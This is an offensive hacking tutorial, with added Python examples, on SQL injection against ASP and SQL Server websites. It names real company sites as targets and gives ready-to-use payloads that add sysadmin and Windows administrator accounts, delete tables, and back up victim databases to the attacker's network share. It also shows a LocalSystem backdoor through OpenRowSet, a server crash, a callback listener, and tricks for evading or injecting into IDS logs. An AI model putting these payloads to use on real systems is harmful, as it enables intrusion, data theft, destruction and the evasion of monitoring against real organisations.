Many news, BBS and e-commerce sites at home and abroad are built on ASP + SQL Server, and much of the ASP is written by inexperienced programmers (many fresh out of school), so attacks against ASP + SQL succeed at a fairly high rate. This kind of attack has little to do with the NT version or the SQL Server version, and there is no patch for it, because the vulnerability is created by the programmer: most books that teach ASP programming carry it in their own sample code. In fact a few perfectly "legitimate" ASP requests to SQL Server leave endless trouble behind!
This attack method grew out of the ' or '1'='1 vulnerability (we'll call it a vulnerability for now). I assume you already know how it works; the next step is exec sp_addlogin Hax (add a login named Hax to the database). But this is very restricted: first, the SQL Server account used by the ASP page has to be an administrator (sa or a member of sysadmin), and second, the request has to be submitted in a form that still parses.
Some programmers write select * from news where id=... and topic=... and ...
If you request the database like this:
news.asp?id=2;exec sp_addlogin Hax
the statement becomes
select * from news where id=2;exec sp_addlogin Hax and topic=... and ...
After the call to the sp_addlogin stored procedure comes the rest of the and condition, so the batch has a syntax error and sp_addlogin does not run either.
The fix:
news.asp?id=2;exec sp_addlogin Hax;--
The -- turns everything after sp_addlogin into a comment, so there is no syntax error and sp_addlogin executes normally!
Let's put them together (note that sp_addsrvrolemember takes the login first and the role second):
news.asp?id=2;exec master.dbo.sp_addlogin Hax;--
news.asp?id=2;exec master.dbo.sp_password null,Hax,Hax;--
news.asp?id=2;exec master.dbo.sp_addsrvrolemember Hax,sysadmin;--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user Hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators Hax /add';--
This way you have left a Hax administrator account in both the database and the operating system. (xp_cmdshell runs as the SQL Server service account, so the two net commands only succeed when that account is LocalSystem or a local administrator.)
Of course, the premise is that the ASP page connects as the SQL administrator, so don't bother trying this against shared hosting (virtual hosts); the vulnerability won't exist there in this form.
Later we'll discuss how to break in when the other side does not use the SQL administrator account; that will also involve attacking port 1433 directly.
Of course, you can also try adding a ' after id=2; it mainly depends on how the other side's ASP builds its query.
What do we do when the SQL account used by the ASP program is not the administrator?
For example, the homepage of Tian Rongxin (TopSec) has news items like:
http://www.talentit.com.cn/news/news-2.asp?newid=117
You can try http://www.talentit.com.cn/news/news-2.asp?newid=117;select 123;--
Haha, an error is reported: select 123 fails, so evidently Tian Rongxin's ASP wraps the newid value in ' quotes.
So try http://www.talentit.com.cn/news/news-2.asp?newid=117';delete news;--
Haha, I think the news table gets deleted, as long as the table name is right.
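To make the two cases above concrete (unquoted id with and without ;--, and quoted newid with and without the closing '), here is an added example that is not part of the original article. It pastes a request value into two assumed query shapes the way the ASP page does, splits the resulting batch into the statements SQL Server would actually see (';' outside a string literal ends a statement, '--' comments out the rest), and then runs the quoted case against an in-memory SQLite table both by string pasting and with a bound parameter. The templates, the 'hacking' topic and the SQLite table are assumptions for illustration; SQLite needs delete from news where T-SQL also accepts delete news.

```python
import sqlite3

# Assumed query shapes.  The article only says the ASP does
# "select * from news where id=... and topic=..." and, for the second site,
# that newid is wrapped in quotes; these templates are our guess.
UNQUOTED = "select * from news where id = {v} and topic = 'hacking'"
QUOTED = "select * from news where newid = '{v}'"


def build(template, value):
    """What the vulnerable ASP page does: paste the request parameter into the SQL text."""
    return template.replace("{v}", value)


def split_batch(sql):
    """Split a T-SQL batch the way the server's parser sees it: ';' outside a
    string literal ends a statement, '--' outside a literal comments out the
    rest of the line, '' inside a literal is an escaped quote.
    Returns the stripped, non-empty statements."""
    stmts, cur, in_str, i, n = [], [], False, 0, len(sql)
    while i < n:
        ch = sql[i]
        if in_str:
            cur.append(ch)
            if ch == "'":
                if i + 1 < n and sql[i + 1] == "'":   # escaped quote, stay inside the literal
                    cur.append("'")
                    i += 1
                else:
                    in_str = False
        elif ch == "'":
            in_str = True
            cur.append(ch)
        elif ch == ";":
            stmts.append("".join(cur))
            cur = []
        elif sql.startswith("--", i):                 # comment: skip to end of line
            nl = sql.find("\n", i)
            i = n if nl == -1 else nl
            continue
        else:
            cur.append(ch)
        i += 1
    stmts.append("".join(cur))
    return [s.strip() for s in stmts if s.strip()]


def statements_for(template, value):
    """Statements SQL Server would execute for one request parameter value."""
    return split_batch(build(template, value))


def demo_sqlite(payload):
    """Run the quoted template against an in-memory SQLite table two ways:
    pasted into the text and executed as a batch (the vulnerable ASP pattern),
    and with a bound parameter.  Returns (rows left after unsafe, rows left after safe)."""
    def fresh():
        c = sqlite3.connect(":memory:")
        c.executescript(
            "create table news(newid text, body text);"
            "insert into news values('117','first'),('118','second');")
        return c

    c = fresh()
    c.executescript(build(QUOTED, payload))          # whole batch runs, injected statement included
    unsafe_left = c.execute("select count(*) from news").fetchone()[0]
    c = fresh()
    c.execute("select * from news where newid = ?", (payload,)).fetchall()  # value stays data
    safe_left = c.execute("select count(*) from news").fetchone()[0]
    return unsafe_left, safe_left


if __name__ == "__main__":
    for t, v in [(UNQUOTED, "2; exec sp_addlogin Hax"),
                 (UNQUOTED, "2; exec sp_addlogin Hax ;--"),
                 (QUOTED, "117; select 123 ;--"),
                 (QUOTED, "117'; delete news ;--")]:
        print(repr(v), "->", statements_for(t, v))
    print(demo_sqlite("117'; delete from news ;--"))
```

Without the ;-- the second statement still carries the trailing and topic = ... and is rejected; with it the trailing text is gone. In the quoted template the first payload never leaves the string literal, which is why it produces only an error, while 117'; ... closes the literal and the second statement runs. The parameterized query returns no rows and leaves the table intact.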
Even when it is not the administrator, the SQL account used by the ASP is usually the owner of its database, so at least inside that database it has high privileges.
But we don't know the database name. What then? Look at the db_name() function.
Open Query Analyzer and try print db_name().
Likewise: declare @a sysname;set @a=db_name();backup database @a to disk='\\your_ip\your_share\bak.dat',name='test';--
Heh, their current database is now backed up onto your hard disk, and everyone knows what to do next. (The backup is written by the SQL Server service account, so the share has to be writable by it, for example by Everyone.)
The same trick can also find the IP address of the other side's SQL Server.
First install a firewall and enable alerts on ICMP, 139/tcp and 445/tcp.
Then try news.asp?id=2;exec master.dbo.xp_cmdshell 'ping your_ip'
If the firewall reports that someone is pinging you, you can be sure the other side's ASP runs with SQL administrator rights, and you have also pinned down the exact location of their SQL Server. Many large sites separate the web server from the database server for performance, and once the other side has patched and you can no longer see the source code, I think this is the only quick way to locate their SQL Server.
So, if the ASP does not have SQL administrator rights, we cannot call xp_cmdshell. What then?
Don't worry, try this: news.asp?id=2;declare @a sysname;set @a=db_name();backup database @a to disk='\\your_ip\your_share\bak.dat',name='test';--
Now your firewall should have raised an alert: someone connected to your port 445 or port 139 (139 in the Win9x case), which exposes the IP address of the other side's SQL Server.
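The firewall alert above is just a way to catch the callback. As an added example that is not part of the original article, here is a small listener that does the same job without a firewall: it accepts the TCP connection the victim's SQL Server makes to the share path (445, or 139 for Win9x) and records the source address. It never speaks SMB; the handshake alone reveals the host. Host, port and the simulated callback are assumptions for the demo.

```python
import socket
import socketserver
import threading
import time


class _Recorder(socketserver.BaseRequestHandler):
    """Record who connected.  We answer nothing: the TCP handshake alone tells us
    which host the SQL Server service reached out from."""

    def handle(self):
        self.server.hits.append((self.client_address[0], self.server.server_address[1]))


class _Catcher(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, addr):
        self.hits = []            # (source_ip, local_port) per connection
        super().__init__(addr, _Recorder)


def start_listener(host="0.0.0.0", port=445):
    """Listen on the port the injected BACKUP ... TO DISK='\\\\ip\\share\\...' will hit.
    Port 445 needs root and must be free (stop smbd on a Linux box first)."""
    srv = _Catcher((host, port))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def wait_for_hit(srv, timeout=30.0):
    """Block until the first connection arrives; returns (source_ip, local_port) or None."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if srv.hits:
            return srv.hits[0]
        time.sleep(0.05)
    return None


def simulate_callback(host, port):
    """Stand-in for the victim's SQL Server opening the share: a plain TCP connect."""
    with socket.create_connection((host, port), timeout=5):
        pass


if __name__ == "__main__":
    srv = start_listener("127.0.0.1", 0)       # port 0 = any free port, for the local demo
    simulate_callback("127.0.0.1", srv.server_address[1])
    print("SQL Server is at", wait_for_hit(srv, 5)[0])
    srv.shutdown()
```

In real use you start it on 445 (and a second copy on 139), submit the backup URL, and read the source address off the first hit; the backup itself will fail because nothing speaks SMB back, but the address is what you wanted.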
What if the account isn't even the owner of the database? Next time I'll tell you a better way.
Actually backing up the database onto your own hard disk is a bit much: if their database is large, you may have to reconnect your dial-up more than once.
Next time we'll talk about evading IDS while carrying out ASP + SQL penetration.
Some good IDS have already started watching for the xp_cmdshell keyword.
OK, comrades, see you next time.
All the URLs above should be submitted through VBScript rather than typed into the address bar, because the browser's address bar mangles some special characters and your command would not arrive intact:
window.location.href = URL
Supplement: this problem has been raised on the Net before, but only as a few simple xp_cmdshell calls with a lot of restrictions. There are actually many places worth exploring, such as
www.guosen.com.cn. The problem shows up in their certificate documents; they use Microsoft's three-tier architecture, and with the xp_cmdshell method mentioned earlier the strings get filtered,
so I tried enabling the telnet service and an account in the Administrators group on their machine through SQL requests! Because their Check Point firewall checks data going in and out very strictly,
it is hard to get at the database structure, but there is still a way :P
By the way, keep an eye on the sqloledb provider and the db_name(), OpenRowSet and OpenDataSource functions. When the SQL Server account used by the ASP is just an ordinary user, they are
very useful!
New SQL Server vulnerabilities and some breakthroughs
Next I want to talk about some new SQL Server bugs. I worked on them for a long time and was lucky to find them, and I don't dare claim they are
exclusive: quite possibly some experts already know them, after all I have been working with SQL Server for less than a year :P
1. About OpenRowSet and OpenDataSource
Maybe some people already know this trick: using OpenRowSet to send local commands.
The usual form (including in the MSDN documentation) is:
select * from OpenRowSet('sqloledb','myserver';'sa';'','select * from table')
Visibly (even by its name) OpenRowSet is just a quick way to query a remote database. It has to be followed by a select, that is, a recordset must be returned.
So can we use it to call xp_cmdshell? The answer is yes!
select * from OpenRowSet('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')
set fmtonly off must be added to disable the default of returning column information only; this way the rowset returned by xp_cmdshell is handed to the outer select.
By default an empty set comes back, the outer select errors, and the command is not executed.
So what if we want to call sp_addlogin, which unlike xp_cmdshell returns no rowset at all and so cannot be rescued by the fmtonly setting? Do this:
select * from OpenRowSet('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hectic')
The command returns at least the result of select 'OK!', so your machine will display OK!, and at the same time a hectic login is added to the other side's database. In other words, we use
the set returned by select 'OK!' to fool the local select request, which means the command executes normally. The same works with sp_addsrvrolemember, and with OpenDataSource! As for
what this is really useful for, that's easy to imagine :P
2. Two msdasql requests
I wonder whether you have tried connecting to a remote database with msdasql. Of course this API must be called by the SQL Server administrator.
select * from OpenRowSet('msdasql','driver={SQL Server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','select * from table1 select * from table2')
When table1 and table2 have different numbers of columns, you will find the other side's SQL Server crashes, local connections fail, and system resource usage looks normal. After using pskill to kill
the SQL Server process, unless the machine is rebooted, SQL Server cannot start normally or keeps raising illegal operations. I just happened to find this bug.
This problem only occurs with msdasql, not with sqloledb. It seems the problem is not the mismatch between the number of requested sets and the number returned, because
that is still something in msdasql itself. As for the specific cause, let's each take a closer look :P
3. A terrible backdoor
In the past I saw people on the Net say that a backdoor can be planted in SQL Server by adding a trigger or a job, or by rewriting sp_addlogin and sp_addsrvrolemember. These methods certainly work,
but they are easy to discover. Have you thought about sqloledb's local connection mapping? For example, using the SQL Server administrator account, execute
the command
select * from OpenRowSet('sqloledb','trusted_connection=yes;data source=hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''')
This creates a local connection mapping named hectic on the other side's server. As long as SQL Server is not restarted the mapping keeps existing; at least I don't yet know
how to find connection mappings that others have planted.
After running the command above, you will find that even the guest user, who has no SQL Server permissions at all, can run the same command! And the privilege is
LocalSystem (with a default installation)! Haha! This can be used to leave a backdoor on a SQL Server that has already been broken into and where administrator rights were obtained.
The above was tested on SQL Server 2000 and SQL Server 2000 SP1.
* There is another guess. Have you noticed the two DSNs that Windows ships by default, one named LocalServer and the other MQIS? Both were created to connect to SQL Server with the local administrator
account. If the other side's SQL Server is started under a custom Power User account, then sa only has the rights of that Power User, which is hard to do anything with.
Run the following command:
select * from OpenRowSet('msdasql','dsn=localserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:\''')
You should be able to connect to the local SQL Server with LocalServer's administrator account and then run local commands with that account's rights. I wanted to use this to break out of an sa
that only has Power User rights. The problem is that sqloledb cannot use a DSN connection, while msdasql can only be called by the administrator. So I am looking for a way for guest to call msdasql.
If anyone knows how to break through this or has a new idea, let's discuss it together. If this could be exploited as guest, it would be a very serious security vulnerability,
because any SQL statement we discussed above can be submitted to the other side's ASP to be executed for us :P
Using T-SQL to evade IDS, or to attack IDS
IDS are getting smarter.
Some IDS watch for xp_cmdshell and sp_addlogin.
But real artificial intelligence still doesn't exist today, so such monitoring can always be lied to.
First, evading the IDS:
Suppose the IDS watches for the xp_cmdshell keyword.
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
Everybody can see how this works. There is another option: xp_cmdshell, as a stored procedure in the master database, has a fixed object ID number, so we can also do this.
Say the ID is 988456:
declare @a sysname select @a=name from master..sysobjects where id=988456 exec @a 'dir c:\'
Or, of course:
declare @a sysname select @a=name from master..sysobjects where id=988455+1 exec @a 'dir c:\'
This way the IDS cannot fully monitor it.
sp_addlogin can be handled the same way.
Now, attacking the IDS:
Because an IDS produces a lot of data, it usually backs its logs up day by day into a conventional database, such as SQL Server.
Using the old recordset.AddNew method would seriously hurt IDS performance, because a T-SQL request through ADO is not only more efficient but also lets some of the work be handed over to SQL Server.
Normally the program writes
insert table values('log content',...)
So think about it: if we submit
temp') exec xp_cmdshell 'dir c:\'--
then after submission it becomes
insert table values('log content'...'temp') exec xp_cmdshell 'dir c:\'--')
and xp_cmdshell runs inside the IDS database :)
Of course, an IDS is a sniffer that captures everything, and when a browser submits a request it turns the spaces into %20.
So %20 is what gets submitted to SQL Server, and your command cannot execute.
The only way is
insert/**/table/**/values('log content'...'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/--')
Use /**/ instead of spaces as the separator, and your T-SQL can execute inside the IDS database.
You can also use other statements to back the IDS database up to your shared directory.
Haha.
In fact the principle is the same as attacking the ASP; only the space becomes /**/.
If the ASP used a select, we used ' to close it off.
Now that the IDS uses an insert, we use ') to close it off.
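From the defender's side, the evasions above all beat a plain substring watch but leave structural traces. As an added example that is not part of the original article, here is a small detector run over constructed request fragments (the article's plain form, the 'xp_'+'cmdshell' concatenation, the sysobjects lookup, and the /**/ insert payload): naive_match shows what a keyword-only IDS sees, while detect first undoes %20 and /**/ and folds string concatenation, then also flags executing a variable and reading procedure names from the catalog. The sample strings and the watch-list are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Watch-list the article says "some good IDS" use.
KEYWORDS = ("xp_cmdshell", "sp_addlogin", "sp_addsrvrolemember")

# Constructed request fragments, not real captures.
SAMPLES = {
    "plain":      "id=2;exec master.dbo.xp_cmdshell 'dir c:\\';--",
    "concat":     "id=2;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\\'",
    "catalog":    "id=2;declare @a sysname select @a=name from master..sysobjects where id=988455+1 exec @a 'dir c:\\'",
    "ids_insert": "temp')/**/exec/**/xp_cmdshell/**/'dir%20c:\\'/**/--",
    "benign":     "id=2",
}


def naive_match(request):
    """Plain substring watch, as the article assumes the IDS does."""
    low = request.lower()
    return [k for k in KEYWORDS if k in low]


def normalize(request):
    """Undo the encodings and tricks before matching: %20 -> space, /**/ -> space,
    'xp_'+'cmdshell' -> 'xp_cmdshell', then squeeze whitespace and lower-case."""
    s = unquote(request)                              # %20 -> ' ' (unquote leaves '+' alone)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)      # inline comments act as whitespace in T-SQL
    s = re.sub(r"'\s*\+\s*'", "", s)                  # fold adjacent literal concatenation
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def detect(request):
    """Keyword hits on the normalized text plus two structural signals that survive
    any renaming: executing a variable, and reading procedure names from the catalog."""
    s = normalize(request)
    hits = [k for k in KEYWORDS if k in s]
    if re.search(r"\bexec(?:ute)?\s*@\w+", s):
        hits.append("exec-variable")
    if re.search(r"\b(?:sysobjects|sys\.objects|sys\.procedures)\b", s):
        hits.append("catalog-lookup")
    return hits


def triage(samples=SAMPLES):
    """Return {name: (naive hits, improved hits)} for every sample."""
    return {name: (naive_match(req), detect(req)) for name, req in samples.items()}


if __name__ == "__main__":
    for name, (naive, better) in triage().items():
        print(f"{name:10s} naive={naive} detect={better}")
```

The concatenation and catalog samples produce nothing for the substring watch but are caught by the exec-variable and catalog-lookup signals; the /**/ payload normalizes back into an ordinary exec xp_cmdshell statement.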
Well, you can think up many other new intrusion statements yourself. The best testing tool is Query Analyzer.
Http://www.sanxia.name